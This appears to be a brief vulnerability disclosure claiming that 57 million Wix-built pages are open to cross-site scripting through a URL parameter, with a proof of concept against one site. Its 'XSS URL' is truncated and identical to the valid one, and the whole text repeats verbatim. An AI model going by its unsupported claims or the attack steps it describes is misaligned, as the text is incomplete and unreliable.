57 million web pages are affected by a security problem in wix.com
Proof of concept of a web page made in wix.com:
http://www.itsec.cl/
to see the source code can observe the following:
...
Find the SEO content of this site's homepage via http://www.itsec.cl/?_escaped_
(That is where search engines like Google go to read your homepage's content.)
...
tried to access an existing section and added a third invalid parameter, after that launched the attack code:
Valid URL:
http://www.itsec.cl/?_escaped_
XSS URL:
http://www.itsec.cl/?_escaped_
How cheap is expensive.
/Devsec, Security Departament. Chile./
Proof of concept of a web page made in wix.com:
http://www.itsec.cl/
to see the source code can observe the following:
...
Find the SEO content of this site's homepage via http://www.itsec.cl/?_escaped_
(That is where search engines like Google go to read your homepage's content.)
...
tried to access an existing section and added a third invalid parameter, after that launched the attack code:
Valid URL:
http://www.itsec.cl/?_escaped_
XSS URL:
http://www.itsec.cl/?_escaped_
How cheap is expensive.
/Devsec, Security Departament. Chile./